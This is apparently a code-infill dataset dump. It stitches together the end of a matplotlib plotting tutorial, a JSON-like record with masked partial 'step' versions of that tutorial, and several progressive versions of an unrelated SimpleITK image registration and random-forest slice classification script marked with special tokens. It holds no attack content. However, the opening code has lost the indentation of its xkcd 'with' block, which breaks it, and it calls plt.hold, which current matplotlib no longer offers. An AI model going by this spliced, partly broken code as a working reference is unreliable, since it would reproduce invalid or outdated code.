plt.hold(True)
plt.plot(X, S, label="sine")
plt.legend(loc=5)
plt.show()
"""
# Axis labels and title
# Set with xlabel, ylabel, and title
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.xlabel("time")
plt.ylabel("amplitude")
plt.title("Cosine Plot")
plt.show()
"""
# Annotations
# The annotate command adds notes, including arrows, inside the plot
"""
X = np.linspace(-np.pi, np.pi, 256)
S = np.sin(X)
plt.plot(X, S, label="sine")
plt.scatter([0], [0], color="r", linewidth=10)
plt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),
textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
"""
# The structure is Figure [ Axes [ Axis ] ]
# Figure : used to open multiple windows or to set the figure size.
#          plot creates a Figure automatically, so an explicit one is
#          usually unnecessary.
#          Use the gcf command to get the current Figure object.
"""
f1 = plt.figure(figsize=(100,2))
plt.plot(np.random.randn(100))
plt.show()
"""
"""
f1 = plt.figure(1)
plt.plot([1,2,3,4], 'ro:')
f2= plt.gcf()
print(f1, id(f1))
print(f2, id(f2))
plt.show()
"""
# Axes and Subplot
# When several plots are arranged inside one window (Figure), each plot
# belongs to an object called an Axes.
# The subplot command creates an Axes object; plot creates one automatically.
# subplot lays Axes objects out in a grid.
# Think of the Figure as a matrix and each Axes as one of its elements:
# two plots stacked vertically form a 2x1 matrix.
# subplot takes 3 arguments: the first 2 define the matrix, the third the position.
"""
x1 = np.linspace(0.0, 5.0)
x2 = np.linspace(0.0, 2.0)
y1 = np.cos(2 * np.pi * x1) * np.exp(-x1)
y2 = np.cos(2 * np.pi * x2)
ax1 = plt.subplot(2, 1, 1)
plt.plot(x1, y1, 'yo-')
plt.title('A tale of 2 subplots')
plt.ylabel('Dampled oscillation')
print(ax1)
ax2 = plt.subplot(2, 1, 2)
plt.plot(x2, y2, 'r.-')
plt.xlabel('time (s)')
plt.ylabel('Undamped')
print(ax2)
plt.show()
"""
# The subplot arguments (2,2,1) can be abbreviated as 221
"""
plt.subplot(221); plt.plot([1,2]); plt.title(1)
plt.subplot(222); plt.plot([1,2]); plt.title(2)
plt.subplot(223); plt.plot([1,2]); plt.title(3)
plt.subplot(224); plt.plot([1,2]); plt.title(4)
plt.tight_layout()
plt.show()
"""
# xkcd style
X = np.linspace(-3, 3, 4096)
C = np.cos(X)
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label="cosine")
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,
-50), textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
|
normal
|
{
"blob_id": "89ffb2da456d2edf15fde8adc01615a277c6caa1",
"index": 8522,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-3": "<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\n<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\n\n##########################################\n# line plot\n#########################################\n\n# x축 생략시 x축은 0, 1, 2, 3이 됨\n\"\"\"\nplt.plot([1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n\n# x축과 y축 지정\n\"\"\"\nplt.plot([10, 20, 30, 40], [1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n# 스타일지정\n# 색깔, 마커, 선 순서로 지정함\n# 색깔 : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), block(k), white(w)\n# 마커 : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),\n# triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),\n# tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),\n# hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)\n# 선 : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)\n\"\"\"\nplt.plot([1,4,9,16], 'bs:')\nplt.show()\n\"\"\"\n\n\n# 기타스타일\n# http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D 참고\n# color(c) : 선색깔\n# linewidth(lw) : 선굵기\n# linestyle(ls) : 선스타일\n# marker : 마커종류\n# markersize(ms) : 마커크기\n# markeredgecolor(mec) : 마커 선 색깔\n# markeredgewidth(mew) : 마커 선 굵기\n# markerfacecolor(mfc) : 마커 내부 색깔\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.show()\n\"\"\"\n\n\n# 그림 범위지정\n# xlim, ylim에서 최소, 최대값 지정\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.xlim(-10, 10)\nplt.ylim(-10, 30)\nplt.show()\n\"\"\"\n\n# 틱 설정\n# 틱 : 플롯이나 차트에서 축상의 위치 표시 지점\n# 틱라벨 : 틱 위에 써진 숫자 혹은 글자\n# xticks, yticks로 틱라벨 지정\n# 틱 라벨 문자열에는 $$사이에 LaTeX 수학 문자식 넣을수 있다\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC = np.cos(X)\nplt.plot(X, C)\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])\nplt.yticks([-1, 0, +1])\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\\pi$', r'$-\\pi/2$',\n'0', r'$+\\pi/2$', r'$+\\pi$'])\nplt.yticks([-1, 0, +1], [\"Low\", \"Zero\", \"High\"])\nplt.grid(False) # grid없애기\nplt.show()\n\"\"\"\n\n\n# 여러개 선 그리기\n# x, y, 스타일을 여러개 지정하면 됨\n\"\"\"\nt = np.arange(0., 5., 0.2)\nplt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')\nplt.show()\n\"\"\"\n\n\n# 하나의 그림에 복수의 plot명령 적용 : 홀드\n# hold(True) : 겹치기 시작\n# hold(False) : 겹치기 종료\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.hold(True)\nplt.plot([9,16,4,1], c=\"k\", lw=3, ls=\":\", marker=\"s\", ms=10, mec=\"m\", mew=5,\n mfc=\"c\")\nplt.hold(False)\nplt.show()\n\"\"\"\n\n\n# 범례\n# legent명령으로 범례 추가\n# loc인수로 범례의 위치 지정\n# loc : best(0), upper right(1), upper left(2), lower left(3),\n# lower right(4), right(5), center left(6), center right(7)\n# lower center(8), upper center(9), center(10)\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.hold(True)\nplt.plot(X, S, label=\"sine\")\nplt.legend(loc=5)\nplt.show()\n\"\"\"\n\n# x축, y축 라벨, 타이틀\n# xlabel, ylabel, title로 지정\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.xlabel(\"time\")\nplt.ylabel(\"amplitude\")\nplt.title(\"Cosine Plot\")\nplt.show()\n\"\"\"\n\n# 부가설명\n# annotate명령을 사용하여 그림내에 화살표를 포함한 부가 설명 넣을수 있음\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nS = np.sin(X)\nplt.plot(X, S, label=\"sine\")\nplt.scatter([0], [0], color=\"r\", linewidth=10)\nplt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),\n textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, 
color=\"g\"))\nplt.show()\n\"\"\"\n\n\n# Figure [ Axes [ Axis] ] 의 구조이다\n# Figure : 여러개의 윈도우를 띄우거나, 그림의 크기 지정시 사용\n# plot사용시 자동으로 Figure를 생성하므로 명시적으로 생성할 필요는\n# 없음\n# figure객체를 얻으려면 gcf 명령 사용\n\"\"\"\nf1 = plt.figure(figsize=(100,2))\nplt.plot(np.random.randn(100))\nplt.show()\n\"\"\"\n\"\"\"\nf1 = plt.figure(1)\nplt.plot([1,2,3,4], 'ro:')\nf2= plt.gcf()\nprint(f1, id(f1))\nprint(f2, id(f2))\nplt.show()\n\"\"\"\n\n\n# Axes와 Subplot\n# 하나의 윈도우(Figure)안에 여러개의 플롯을 배열하는 경우 각각의 플롯은\n# Axes라고 불리는 객체에 속함\n# subplot 명령으로 Axes객체를 생성, plot명령 사용시 자동으로 Axes를 생성함\n# subplot은 그리드 형태의 Axes객체들을 생성\n# Figure가 행렬(matrix)이고 Axes가 행렬의 원소라고 생각하면 됨.\n# 위와 아래 두개의 플롯이 있는 경우 2X1행렬\n# subplot은 3개의 인수를 가지고 처음 2개가 행렬 정의, 세번째가 위치 지정\n\"\"\"\nx1 = np.linspace(0.0, 5.0)\nx2 = np.linspace(0.0, 2.0)\ny1 = np.cos(2 * np.pi * x1) * np.exp(-x1)\ny2 = np.cos(2 * np.pi * x2)\n\nax1 = plt.subplot(2, 1, 1)\nplt.plot(x1, y1, 'yo-')\nplt.title('A tale of 2 subplots')\nplt.ylabel('Dampled oscillation')\nprint(ax1)\n\nax2 = plt.subplot(2, 1, 2)\nplt.plot(x2, y2, 'r.-')\nplt.xlabel('time (s)')\nplt.ylabel('Undamped')\nprint(ax2)\n\nplt.show()\n\"\"\"\n\n# subplot의 인수는 (2,2,1)를 줄여서 221로 표시 가능\n\"\"\"\nplt.subplot(221); plt.plot([1,2]); plt.title(1)\nplt.subplot(222); plt.plot([1,2]); plt.title(2)\nplt.subplot(223); plt.plot([1,2]); plt.title(3)\nplt.subplot(224); plt.plot([1,2]); plt.title(4)\nplt.tight_layout()\nplt.show()\n\"\"\"\n\n\n# xkcd 스타일\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\n\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label=\"cosine\")\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,\n -50), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, color=\"g\"))\nplt.show()\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
<|reserved_special_token_0|>
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
def slice_probability(ct_image, classifier):
test_list = []
max_list = []
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
probabilities = classifier.predict_proba(test_array)
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
if len(max_list) == 1:
print('Slice {} has highest probability which is: {}'.format(
max_list[0], max))
else:
print('Slices {} have the highest probability which is: {}'.format(
max_list, max))
return None
<|reserved_special_token_1|>
import SimpleITK as sitk
import numpy as np
from sklearn.ensemble import RandomForestClassifier
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
def slice_probability(ct_image, classifier):
test_list = []
max_list = []
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
probabilities = classifier.predict_proba(test_array)
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
if len(max_list) == 1:
print('Slice {} has highest probability which is: {}'.format(
max_list[0], max))
else:
print('Slices {} have the highest probability which is: {}'.format(
max_list, max))
return None
<|reserved_special_token_1|>
import SimpleITK as sitk
import numpy as np
